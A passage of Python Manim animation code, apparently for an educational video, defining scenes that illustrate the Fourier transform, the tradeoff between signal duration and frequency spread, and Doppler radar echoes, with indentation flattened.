self.play(
GrowFromCenter(brace),
Write(phrase, run_time = 1)
)
else:
self.play(
change_width_anim(width),
ReplacementTransform(
VGroup(last_phrase, last_brace),
VGroup(phrase, brace),
rate_func = squish_rate_func(smooth, 0.5, 1),
),
run_time = 2
)
self.wait()
# self.play(*map(FadeOut, [graph, brace, phrase]))
last_phrase = phrase
last_brace = brace
#Talk about correlations
short_signal_words = TextMobject(
"Short", "signal", "correlates",
"with", "wide range", "of frequencies"
)
long_signal_words = TextMobject(
"Only", "wide", "signals", "correlate",
"with a", "short range", "of frequencies"
)
phrases = VGroup(short_signal_words, long_signal_words)
for phrase in phrases:
phrase.scale(0.8)
phrase.set_color_by_tex_to_color_map({
"short" : RED,
"long" : GREEN,
"wide" : GREEN,
}, case_sensitive = False)
phrases.arrange(DOWN)
phrases.to_edge(UP)
long_graph = FunctionGraph(
lambda x : 0.5*np.sin(freq*x),
x_min = -FRAME_WIDTH,
x_max = FRAME_WIDTH,
n_components = 0.001
)
long_graph.set_color(BLUE)
long_graph.next_to(graph, UP, MED_LARGE_BUFF)
self.play(
ShowCreation(long_graph),
*list(map(FadeOut, [last_brace, last_phrase]))
)
self.play(
Write(short_signal_words),
change_width_anim(widths[2])
)
self.play(
long_graph.stretch, 0.35, 0,
long_graph.set_color, GREEN,
run_time = 5,
rate_func = wiggle
)
self.wait()
self.play(
Write(long_signal_words),
change_width_anim(widths[0]),
)
self.play(
long_graph.stretch, 0.95, 0,
long_graph.set_color, average_color(GREEN, BLUE),
run_time = 4,
rate_func = wiggle
)
self.wait()
class CrossOutDefinitenessAndCertainty(TeacherStudentsScene):
def construct(self):
words = VGroup(
TextMobject("Definiteness"),
TextMobject("Certainty"),
)
words.arrange(DOWN)
words.next_to(self.teacher, UP+LEFT)
crosses = VGroup(*list(map(Cross, words)))
self.add(words)
self.play(
self.teacher.change, "sassy",
ShowCreation(crosses[0])
)
self.play(
self.get_student_changes(*3*["erm"]),
ShowCreation(crosses[1])
)
self.wait(2)
class BringInFourierTranform(TeacherStudentsScene):
def construct(self):
fourier = TextMobject("Fourier")
fourier.scale(1.5)
fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)
fourier.save_state()
fourier.shift(DOWN)
fourier.fade(1)
self.play(
self.teacher.change, "raise_right_hand",
fourier.restore
)
self.change_student_modes("happy", "erm", "confused")
self.look_at(3*LEFT + 2*UP)
self.wait(3)
class LastVideoWrapper(Scene):
def construct(self):
title = TextMobject("Visualizing the Fourier Transform")
title.to_edge(UP)
screen_rect = ScreenRectangle(height = 6)
screen_rect.next_to(title, DOWN)
self.add(title)
self.play(ShowCreation(screen_rect))
self.wait()
class FourierRecapScene(DrawFrequencyPlot):
CONFIG = {
"frequency_axes_config" : {
"x_max" : 10.0,
"x_axis_config" : {
"unit_size" : 0.7,
"numbers_to_show" : list(range(1, 10, 1)),
}
},
"initial_winding_frequency" : 0.1,
}
def construct(self):
self.setup_axes()
self.preview_fourier_plot()
self.wrap_signal_around_circle()
self.match_winding_to_beat_frequency()
self.follow_center_of_mass()
self.draw_fourier_plot()
self.set_color_spike()
def setup_axes(self):
self.remove(self.pi_creature)
time_axes = self.get_time_axes()
time_axes.to_edge(UP, buff = MED_SMALL_BUFF)
time_axes.scale(0.9, about_edge = UP)
frequency_axes = self.get_frequency_axes()
circle_plane = self.get_circle_plane()
self.add(time_axes)
self.set_variables_as_attrs(
time_axes, frequency_axes,
circle_plane
)
def preview_fourier_plot(self):
time_graph = self.graph = self.get_time_graph(
width = 2,
num_graph_points = 200,
)
fourier_graph = self.get_fourier_transform_graph(
time_graph
)
fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)
#labels
signal_label = TextMobject("Signal")
fourier_label = TextMobject("Fourier transform")
signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)
fourier_label.next_to(fourier_graph, UP)
fourier_label.match_color(fourier_graph)
self.play(
ShowCreation(time_graph, run_time = 2),
Write(signal_label),
)
self.wait()
self.play(
LaggedStartMap(FadeIn, self.frequency_axes),
ReplacementTransform(
time_graph.copy(),
fourier_graph,
run_time = 2
),
ReplacementTransform(
signal_label.copy(),
fourier_label,
run_time = 2,
rate_func = squish_rate_func(smooth, 0.5, 1)
),
)
self.wait()
self.play(LaggedStartMap(
Indicate, self.frequency_axes.x_axis.numbers,
run_time = 4,
rate_func = wiggle,
))
self.wait()
self.play(*list(map(FadeOut, [
self.frequency_axes, fourier_graph,
signal_label, fourier_label,
])))
self.time_graph = time_graph
self.set_variables_as_attrs(time_graph, fourier_label)
def wrap_signal_around_circle(self):
time_graph = self.time_graph
circle_plane = self.circle_plane
freq = self.initial_winding_frequency
pol_graph = self.get_polarized_mobject(time_graph, freq)
winding_freq_label = self.get_winding_frequency_label()
winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))
winding_freq_label.move_to(circle_plane.get_top(), DOWN)
self.add_foreground_mobjects(winding_freq_label)
self.play(
Write(circle_plane, run_time = 1),
ReplacementTransform(
time_graph.copy(), pol_graph,
path_arc = -TAU/4,
run_time_per_flash = 2,
run_time = 2,
),
FadeIn(winding_freq_label),
)
freq = 0.3
self.change_frequency(freq, run_time = 2)
ghost_pol_graph = pol_graph.copy()
self.remove(pol_graph)
self.play(ghost_pol_graph.set_stroke, {"width" : 0.5})
self.play(
*self.get_vector_animations(time_graph),
run_time = 15
)
self.remove(ghost_pol_graph)
self.wait()
def match_winding_to_beat_frequency(self):
self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)
self.add(self.v_lines_indicating_periods)
for freq in range(1, 6):
self.change_frequency(freq, run_time = 5)
self.play(
*self.get_vector_animations(
self.time_graph,
draw_polarized_graph = False
),
run_time = 10
)
self.wait()
def follow_center_of_mass(self):
com_dot = self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
com_arrow = Arrow(UP+3*RIGHT, ORIGIN)
com_arrow.shift(com_dot.get_center())
com_arrow.match_color(com_dot)
com_words = TextMobject("Center of mass")
com_words.next_to(com_arrow.get_start(), UP)
com_words.match_color(com_arrow)
com_words.add_background_rectangle()
com_dot.save_state()
com_dot.move_to(com_arrow.get_start())
com_dot.fade(1)
self.play(
com_dot.restore,
GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),
Write(com_words),
)
self.wait()
squished_func = squish_rate_func(smooth, 0, 0.2)
self.change_frequency(
4,
added_anims = [
FadeOut(com_arrow, rate_func = squished_func),
FadeOut(com_words, rate_func = squished_func),
],
run_time = 5
)
def draw_fourier_plot(self):
frequency_axes = self.frequency_axes
fourier_label = self.fourier_label
self.change_frequency(0, run_time = 2)
self.play(
FadeIn(frequency_axes),
FadeIn(fourier_label),
)
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.get_fourier_graph_drawing_update_anim(fourier_graph)
self.generate_fourier_dot_transform(fourier_graph)
self.change_frequency(5, run_time = 20)
self.wait()
self.change_frequency(7.5, run_time = 10)
self.fourier_graph_drawing_update_anim = Animation(Mobject())
self.fourier_graph = fourier_graph
def set_color_spike(self):
spike_point = self.frequency_axes.input_to_graph_point(
5, self.fourier_graph
)
circle = Circle(color = YELLOW, radius = 0.25)
circle.move_to(spike_point)
circle.save_state()
circle.scale(5)
circle.fade(1)
self.change_frequency(5)
self.play(circle.restore)
self.play(FadeOut(circle))
self.wait()
for x in range(2):
self.change_frequency(5.2, run_time = 3)
self.change_frequency(4.8, run_time = 3)
self.change_frequency(5, run_time = 1.5)
self.wait()
#########
def get_time_graph(self, frequency = 5, width = 2, **kwargs):
# low_x = center-width/2
# high_x = center+width/2
# new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)
# def func(x):
# pure_signal = 0.9*np.cos(TAU*frequency*x)
# factor = new_smooth(x - low_x) - new_smooth(x-high_x)
# return 1 + factor*pure_signal
graph = self.time_axes.get_graph(
lambda x : 1+0.9*np.cos(TAU*frequency*x),
x_min = 0, x_max = width,
**kwargs
)
graph.set_color(YELLOW)
return graph
class RealPartOfInsert(Scene):
def construct(self):
words = TextMobject("(Real part of the)")
words.set_color(RED)
self.add(words)
self.play(Write(words))
self.wait(5)
class CenterOfMassDescription(FourierRecapScene):
def construct(self):
self.remove(self.pi_creature)
circle_plane = self.get_circle_plane()
circle_plane.save_state()
circle_plane.generate_target()
circle_plane.target.set_height(FRAME_HEIGHT)
circle_plane.target.center()
circle_plane.target.axes.set_stroke(width = 2)
circle_plane.targets.set_stroke(width = 2)
circle_plane.target.secondary_lines.set_stroke(width = 1)
start_coords = (0.5, 0.5)
alt_coords = (0.8, 0.8)
com_dot = Dot(color = self.center_of_mass_color)
com_dot.move_to(circle_plane.coords_to_point(*start_coords))
self.add(circle_plane, com_dot)
self.wait()
self.play(
MoveToTarget(circle_plane),
com_dot.move_to,
circle_plane.target.coords_to_point(*start_coords)
)
self.wait()
alt_com_dot = com_dot.copy().move_to(
circle_plane.coords_to_point(*alt_coords)
)
for dot in com_dot, alt_com_dot:
line = Line(ORIGIN, dot.get_center())
line.match_color(com_dot)
angle = line.get_angle()
line.rotate(-angle, about_point = ORIGIN)
brace = Brace(line, UP)
words = brace.get_text("Strength of frequency")
words.add_background_rectangle()
dot.length_label_group = VGroup(line, brace, words)
dot.length_label_group.rotate(angle, about_point = ORIGIN)
line, brace, words = com_dot.length_label_group
self.play(
GrowFromCenter(line),
GrowFromCenter(brace),
FadeIn(words),
)
self.wait()
self.play(
Transform(
com_dot.length_label_group,
alt_com_dot.length_label_group,
),
Transform(com_dot, alt_com_dot),
rate_func = there_and_back,
run_time = 4,
)
#Do rotation
line = com_dot.length_label_group[0]
com_dot.length_label_group.remove(line)
angle = line.get_angle()
arc, alt_arc = [
Arc(
start_angle = 0,
angle = factor*angle,
radius = 0.5,
)
for factor in (1, 2)
]
theta = TexMobject("\\theta")
theta.shift(1.5*arc.point_from_proportion(0.5))
self.play(
FadeOut(com_dot.length_label_group),
Animation(line),
ShowCreation(arc),
Write(theta)
)
self.play(
Rotate(
VGroup(line, com_dot),
angle, about_point = ORIGIN
),
Transform(arc, alt_arc),
theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),
rate_func = there_and_back,
run_time = 4
)
self.wait()
class AskAboutLongVsShort(TeacherStudentsScene):
def construct(self):
self.student_says(
"What happens if we \\\\ change the length of \\\\ the signal?",
student_index = 2,
)
self.play(
self.teacher.change, "happy",
self.get_student_changes("pondering", "confused", "raise_right_hand")
)
self.wait(5)
class LongAndShortSignalsInWindingMachine(FourierRecapScene):
CONFIG = {
"num_fourier_graph_points" : 1000,
}
def construct(self):
self.setup_axes()
self.extend_for_long_time()
self.note_sharp_fourier_peak()
self.very_short_signal()
self.note_wide_fourier_peak()
def setup_axes(self):
FourierRecapScene.setup_axes(self)
self.add(self.circle_plane)
self.add(self.frequency_axes)
self.time_graph = self.graph = self.get_time_graph(width = 2)
self.add(self.time_graph)
self.force_skipping()
self.wrap_signal_around_circle()
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.fourier_graph = fourier_graph
self.add(fourier_graph)
self.change_frequency(5)
self.revert_to_original_skipping_status()
def extend_for_long_time(self):
short_time_graph = self.time_graph
long_time_graph = self.get_time_graph(
width = 10,
num_graph_points = 500,
)
long_time_graph.set_stroke(width = 2)
new_freq = 5.1
long_pol_graph = self.get_polarized_mobject(
long_time_graph,
freq = new_freq
)
fourier_graph = self.fourier_graph
self.change_frequency(new_freq)
self.play(
FadeOut(self.graph),
FadeOut(self.graph.polarized_mobject),
FadeOut(fourier_graph)
)
self.play(
ShowCreation(long_time_graph, rate_func=linear),
ShowCreation(long_pol_graph, rate_func=linear),
run_time = 5
)
self.wait()
self.time_graph = self.graph = long_time_graph
def note_sharp_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.time_graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 5.1)
def very_short_signal(self):
time_graph = self.time_graph
fourier_graph = self.fourier_graph
short_time_graph = self.get_time_graph(width = 0.6)
new_freq = 5.1
short_pol_graph = self.get_polarized_mobject(
short_time_graph,
freq = new_freq
)
self.play(
FadeOut(fourier_graph),
FadeOut(time_graph),
FadeOut(time_graph.polarized_mobject),
)
self.play(
ShowCreation(short_time_graph),
ShowCreation(short_time_graph.polarized_mobject),
)
self.graph = self.time_graph = short_time_graph
self.change_frequency(6.66, run_time = 5)
def note_wide_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 6.66)
###
def note_fourier_peak(self, fourier_graph, freq1, freq2):
fourier_graph = self.fourier_graph
dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)
self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
self.generate_fourier_dot_transform(fourier_graph)
dot = self.fourier_graph_dot
arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)
arrow.next_to(dot, UP, buff = SMALL_BUFF)
self.play(ShowCreation(fourier_graph))
self.change_frequency(freq1,
added_anims = [
MaintainPositionRelativeTo(arrow, dot),
UpdateFromAlphaFunc(
arrow,
lambda m, a : m.set_fill(opacity = a)
),
],
run_time = 3,
)
self.wait()
self.change_frequency(freq2,
added_anims = [
MaintainPositionRelativeTo(arrow, dot)
],
run_time = 3
)
self.wait()
self.play(*list(map(FadeOut, [
dot, arrow, self.center_of_mass_dot
])))
#This is not great...
for attr in "center_of_mass_dot", "fourier_graph_dot":
self.__dict__.pop(attr)
def get_fourier_graph_dots(self, fourier_graph, *freqs):
axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)
dots = VGroup()
for freq in freqs:
point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)
dot = Dot(point)
dot.scale(0.5)
dots.add(dot)
vect = point - axis_point
vect *= 1.3/get_norm(vect)
arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)
arrow.set_color(YELLOW)
arrow.shift(point)
dot.arrow = arrow
return dots
class FocusRectangleInsert(FourierRecapScene):
CONFIG = {
"target_width" : 0.5
}
def construct(self):
self.setup_axes()
self.clear()
point = self.frequency_axes.coords_to_point(5, 0.25)
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect.set_stroke(YELLOW, 2)
self.add(rect)
self.wait()
self.play(
rect.stretch_to_fit_width, self.target_width,
rect.stretch_to_fit_height, 1.5,
rect.move_to, point,
run_time = 2
)
self.wait(3)
class BroadPeakFocusRectangleInsert(FocusRectangleInsert):
CONFIG = {
"target_width" : 1.5,
}
class CleanerFourierTradeoff(FourierTradeoff):
CONFIG = {
"show_text" : False,
"complex_to_real_func" : lambda z : z.real,
"widths" : [0.02, 6, 1],
}
class MentionDopplerRadar(TeacherStudentsScene):
def construct(self):
words = TextMobject("Doppler Radar")
words.next_to(self.teacher, UP)
words.save_state()
words.shift(DOWN).fade(1)
dish = RadarDish()
dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)
plane = Plane()
plane.to_edge(RIGHT)
plane.align_to(dish)
always_shift(plane, LEFT, 1)
plane.flip()
pulse = RadarPulse(dish, plane)
look_at_anims = [
Mobject.add_updater(
pi, lambda pi : pi.look_at(pulse.mobject)
)
for pi in self.get_pi_creatures()
]
self.add(dish, plane, pulse, *look_at_anims)
self.play(
self.teacher.change, "hooray",
words.restore
)
self.change_student_modes("pondering", "erm", "sassy")
self.wait(2)
self.play(
self.teacher.change, "happy",
self.get_student_changes(*["thinking"]*3)
)
self.wait()
dish.set_stroke(width = 0)
self.play(UpdateFromAlphaFunc(
VGroup(plane, dish),
lambda m, a : m.set_fill(opacity = 1 - a)
))
class IntroduceDopplerRadar(Scene):
CONFIG = {
"frequency_spread_factor" : 100,
}
def construct(self):
self.setup_axes()
self.measure_distance_with_time()
self.show_frequency_shift()
self.show_frequency_shift_in_fourier()
def setup_axes(self):
self.dish = RadarDish()
self.dish.to_corner(UP+LEFT)
axes = Axes(
x_min = 0,
x_max = 10,
y_min = -1.5,
y_max = 1.5
)
axes.move_to(DOWN)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.time_label = time_label
axes.add(time_label)
self.axes = axes
self.add(self.dish)
self.add(axes)
def measure_distance_with_time(self):
dish = self.dish
axes = self.axes
distance = 5
time_diff = 5
speed = (2*distance)/time_diff
randy = Randolph().flip()
randy.match_height(dish)
randy.move_to(dish.get_right(), LEFT)
randy.shift(distance*RIGHT)
pulse_graph, echo_graph, sum_graph = \
self.get_pulse_and_echo_graphs(
self.get_single_pulse_graph,
(1,), (1+time_diff,)
)
words = ["Original signal", "Echo"]
for graph, word in zip([pulse_graph, echo_graph], words):
arrow = Vector(DOWN)
arrow.next_to(graph.peak_point, UP, SMALL_BUFF)
arrow.match_color(graph)
graph.arrow = arrow
label = TextMobject(word)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(graph)
graph.label = label
double_arrow = DoubleArrow(
pulse_graph.peak_point,
echo_graph.peak_point,
color = WHITE
)
distance_text = TextMobject("$2 \\times$ distance/(signal speed)")
distance_text.set_width(0.9*double_arrow.get_width())
distance_text.next_to(double_arrow, UP, SMALL_BUFF)
#v_line anim?
pulse = RadarPulseSingleton(
dish, randy,
speed = 0.97*speed, #Just needs slightly better alignment
)
graph_draw = turn_animation_into_updater(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 0.97*axes.x_max
)
)
randy_look_at = Mobject.add_updater(
randy, lambda pi : pi.look_at(pulse.mobject)
)
axes_anim = ContinualAnimation(axes)
self.add(randy_look_at, axes_anim, graph_draw)
self.wait(0.5)
self.add(pulse)
self.play(
Write(pulse_graph.label),
GrowArrow(pulse_graph.arrow),
run_time = 1,
)
self.play(randy.change, "pondering")
self.wait(time_diff - 2)
self.play(
Write(echo_graph.label),
GrowArrow(echo_graph.arrow),
run_time = 1
)
self.wait()
self.play(
GrowFromCenter(double_arrow),
FadeIn(distance_text)
)
self.wait()
self.remove(graph_draw, pulse, randy_look_at, axes_anim)
self.add(axes)
self.play(LaggedStartMap(FadeOut, VGroup(
sum_graph, randy,
pulse_graph.arrow, pulse_graph.label,
echo_graph.arrow, echo_graph.label,
double_arrow, distance_text
)))
def show_frequency_shift(self):
axes = self.axes
dish = self.dish
plane = Plane()
plane.flip()
plane.move_to(dish)
plane.to_edge(RIGHT)
time_diff = 6
pulse_graph, echo_graph, sum_graph = graphs = \
self.get_pulse_and_echo_graphs(
self.get_frequency_pulse_graph,
(1,25), (1+time_diff,50)
)
for graph in graphs:
graph.set_stroke(width = 3)
signal_graph = self.get_frequency_pulse_graph(1)
pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)
pulse_brace.move_to(axes.coords_to_point(1, 1.2))
echo_brace = pulse_brace.copy()
echo_brace.stretch(0.6, 0)
echo_brace.move_to(axes.coords_to_point(7, 1.2))
pulse_text = pulse_brace.get_text("Original signal")
pulse_text.add_background_rectangle()
echo_text = echo_brace.get_text("Echo")
echo_subtext = TextMobject("(Higher frequency)")
echo_subtext.next_to(echo_text, RIGHT)
echo_subtext.match_color(echo_graph)
graph_draw = turn_animation_into_updater(
ShowCreation(sum_graph, run_time = 8, rate_func=linear)
)
pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)
always_shift(plane, LEFT, 1.5)
self.add(graph_draw, pulse, plane)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = a)
))
self.play(
GrowFromCenter(pulse_brace),
FadeIn(pulse_text),
)
self.wait(3)
self.play(
GrowFromCenter(echo_brace),
GrowFromCenter(echo_text),
)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = 1-a)
))
#Only for when -s is run
graph_draw.update(10)
self.wait(0.1)
self.play(Write(echo_subtext, run_time = 1))
self.wait()
self.remove(graph_draw, pulse, plane)
pulse_graph.set_stroke(width = 0)
echo_graph.set_stroke(width = 0)
self.time_graph_group = VGroup(
axes, pulse_brace, pulse_text,
echo_brace, echo_text, echo_subtext,
pulse_graph, echo_graph, sum_graph,
)
self.set_variables_as_attrs(*self.time_graph_group)
def show_frequency_shift_in_fourier(self):
sum_graph = self.sum_graph
pulse_graph = self.pulse_graph
pulse_label = VGroup(self.pulse_brace, self.pulse_text)
echo_graph = self.echo_graph
echo_label = VGroup(
self.echo_brace, self.echo_text, self.echo_subtext
)
#Setup all fourier graph stuff
f_max = 0.02
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {"unit_size" : 0.5},
y_min = -f_max, y_max = f_max,
y_axis_config = {
"unit_size" : 50,
"tick_frequency" : 0.01,
},
)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP,
)
frequency_label.to_edge(RIGHT)
frequency_axes.add(frequency_label)
for graph in pulse_graph, echo_graph, sum_graph:
graph.fourier_transform = get_fourier_graph(
frequency_axes, graph.underlying_function,
frequency_axes.x_min, 25,
complex_to_real_func = abs,
)
#Braces labeling F.T.
original_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(7, 0.9*f_max),
frequency_axes.coords_to_point(9, 0.9*f_max),
),
UP,
).set_color(BLUE)
echo_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(14, 0.4*f_max),
frequency_axes.coords_to_point(18, 0.4*f_max),
),
UP,
).set_color(YELLOW)
# braces = [original_fourier_brace, echo_fourier_brace]
# words = ["original signal", "echo"]
# for brace, word in zip(braces, words):
# brace.add(brace.get_text("F.T. of \\\\ %s"%word))
fourier_label = TexMobject("||\\text{Fourier transform}||")
# fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)
fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)
fourier_label.shift_onto_screen()
fourier_label.set_color(RED)
#v_lines
v_line = DashedLine(
frequency_axes.coords_to_point(8, 0),
frequency_axes.coords_to_point(8, 1.2*f_max),
color = YELLOW,
dash_length = 0.025,
)
v_line_pair = VGroup(*[
v_line.copy().shift(u*0.6*RIGHT)
for u in (-1, 1)
])
v_line = VGroup(v_line)
double_arrow = DoubleArrow(
frequency_axes.coords_to_point(8, 0.007),
frequency_axes.coords_to_point(16, 0.007),
buff = 0,
color = WHITE
)
self.play(
self.time_graph_group.to_edge, UP,
ApplyMethod(
self.dish.shift, 2*UP,
remover = True
),
FadeIn(frequency_axes)
)
self.wait()
self.play(
FadeOut(sum_graph),
FadeOut(echo_label),
pulse_graph.set_stroke, {"width" : 3},
)
self.play(
ReplacementTransform(
pulse_label[0].copy(),
original_fourier_brace
),
ShowCreation(pulse_graph.fourier_transform)
)
self.play(Write(fourier_label))
self.wait()
self.play(ShowCreation(v_line))
self.wait()
self.play(ReplacementTransform(v_line, v_line_pair))
self.wait()
self.play(FadeOut(v_line_pair))
self.wait()
self.play(
FadeOut(pulse_graph),
FadeIn(sum_graph),
ReplacementTransform(
pulse_graph.fourier_transform,
sum_graph.fourier_transform
)
)
self.play(FadeIn(echo_label))
self.play(ReplacementTransform(
echo_label[0].copy(),
echo_fourier_brace,
))
self.wait(2)
self.play(GrowFromCenter(double_arrow))
self.wait()
###
def get_graph(self, func, **kwargs):
graph = self.axes.get_graph(func, **kwargs)
graph.peak_point = self.get_peak_point(graph)
return graph
def get_single_pulse_graph(self, x, **kwargs):
return self.get_graph(self.get_single_pulse_function(x), **kwargs)
def get_single_pulse_function(self, x):
return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)
def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):
return self.get_graph(
self.get_frequency_pulse_function(x, freq),
num_graph_points = 700,
**kwargs
)
def get_frequency_pulse_function(self, x, freq):
factor = self.frequency_spread_factor
return lambda t : op.mul(
2*np.cos(2*freq*(t-x)),
min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)
)
def get_peak_point(self, graph):
anchors = graph.get_anchors()
return anchors[np.argmax([p[1] for p in anchors])]
def get_pulse_and_echo_graphs(self, func, args1, args2):
pulse_graph = func(*args1, color = BLUE)
echo_graph = func(*args2, color = YELLOW)
sum_graph = self.axes.get_graph(
lambda x : sum([
pulse_graph.underlying_function(x),
echo_graph.underlying_function(x),
]),
num_graph_points = echo_graph.get_num_curves(),
color = WHITE
)
sum_graph.background_image_file = "blue_yellow_gradient"
return pulse_graph, echo_graph, sum_graph
class DopplerFormulaInsert(Scene):
def construct(self):
formula = TexMobject(
"f_{\\text{echo}", "=",
"\\left(1 + \\frac{v}{c}\\right)",
"f_{\\text{pulse}}"
)
formula[0].set_color(BLUE)
formula[3].set_color(YELLOW)
randy = Randolph(color = BLUE_C)
formula.scale(1.5)
formula.next_to(randy, UP+LEFT)
formula.shift_onto_screen()
self.add(randy)
self.play(
LaggedStartMap(FadeIn, formula),
randy.change, "pondering", randy.get_bottom(),
)
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
class MentionPRFNuance(TeacherStudentsScene):
def construct(self):
title = TextMobject(
"Speed of light", "$\\gg$", "Speed of a plane"
)
title.to_edge(UP)
self.add(title)
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = 0, y_max = 2,
)
axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)
frequency_label = TextMobject("Frequency")
frequency_label.scale(0.7)
frequency_label.next_to(axes.x_axis.get_right(), UP)
axes.add(frequency_label)
self.add(axes)
pulse_x, shift_x = 4, 6
pulse_graph = self.get_spike_graph(pulse_x)
shift_graph = self.get_spike_graph(shift_x)
shift_graph.set_stroke(YELLOW, 2)
peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)
self.add(pulse_graph)
brace = Brace(peak_points, UP, buff = SMALL_BUFF)
displayed_doppler_shift = TextMobject("How I'm showing the \\\\", "Doppler shift")
actual_doppler_shift = TextMobject("Actual\\\\", "Doppler shift")
doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)
doppler_shift_words.set_color(YELLOW)
doppler_shift_words.scale(0.75)
displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)
actual_doppler_shift.move_to(pulse_graph.peak_point)
actual_doppler_shift.align_to(displayed_doppler_shift)
self.play(
Animation(pulse_graph),
self.teacher.change, "raise_right_hand",
run_time = 1
)
self.play(
ShowCreation(shift_graph),
FadeIn(brace),
Write(displayed_doppler_shift, run_time = 1),
self.get_student_changes(*3*["sassy"]),
)
self.play(
UpdateFromAlphaFunc(
shift_graph,
lambda g, a : Transform(
g, self.get_spike_graph(
interpolate(shift_x, pulse_x+0.01, a),
).match_style(shift_graph)
).update(1),
),
UpdateFromFunc(
brace,
lambda b : b.match_width(
peak_points, stretch = True
).next_to(peak_points, UP, SMALL_BUFF)
),
Transform(
displayed_doppler_shift, actual_doppler_shift,
rate_func = squish_rate_func(smooth, 0.3, 0.6)
),
run_time = 3
)
self.wait(2)
everything = VGroup(
title,
axes, pulse_graph, shift_graph,
brace, displayed_doppler_shift
)
rect = SurroundingRectangle(everything, color = WHITE)
everything.add(rect)
self.teacher_says(
"I'll ignore certain \\\\ nuances for now.",
target_mode = "shruggie",
added_anims = [
everything.scale, 0.4,
everything.to_corner, UP+LEFT,
UpdateFromAlphaFunc(
rect, lambda m, a : m.set_stroke(width = 2*a)
)
],
)
self.change_student_modes(*3*["hesitant"])
self.wait(2)
def get_spike_graph(self, x, color = RED, **kwargs):
graph = self.axes.get_graph(
lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),
color = color,
**kwargs
)
graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))
graph.add(graph.peak_point)
return graph
class TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):
def construct(self):
x = 7
freq = 25
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -2, y_max = 2,
)
axes.center()
title = TextMobject("Echo signal")
title.next_to(axes.y_axis, UP)
axes.add(title)
axes.to_edge(UP)
graph = self.get_frequency_pulse_graph(x = x, freq = freq)
graph.background_image_file = "blue_yellow_gradient"
arrow = Arrow(
axes.coords_to_point(0, -1.5),
axes.coords_to_point(x, -1.5),
color = WHITE,
buff = SMALL_BUFF,
)
time = TextMobject("Time")
time.next_to(arrow, DOWN, SMALL_BUFF)
delta_x = 0.7
brace = Brace(
Line(
axes.coords_to_point(x-delta_x, 1),
axes.coords_to_point(x+delta_x, 1)
),
UP
)
frequency = TextMobject("Frequency")
frequency.set_color(YELLOW)
frequency.next_to(brace, UP, SMALL_BUFF)
time_updown_arrow = TexMobject("\\Updownarrow")
time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)
freq_updown_arrow = time_updown_arrow.copy()
freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)
distance = TextMobject("Distance")
distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)
velocity = TextMobject("Velocity")
velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)
VGroup(freq_updown_arrow, velocity).match_style(frequency)
self.add(axes)
self.play(ShowCreation(graph))
self.play(
GrowArrow(arrow),
LaggedStartMap(FadeIn, time, run_time = 1)
)
self.play(
GrowFromCenter(brace),
LaggedStartMap(FadeIn, frequency, run_time = 1)
)
self.wait()
self.play(
GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),
ReplacementTransform(
time.copy().fade(1),
distance
)
)
self.play(
GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),
ReplacementTransform(
frequency.copy().fade(1),
velocity
)
)
self.wait()
class RadarOperatorUncertainty(Scene):
def construct(self):
dish = RadarDish()
dish.scale(3)
dish.move_to(4*RIGHT + 2*DOWN)
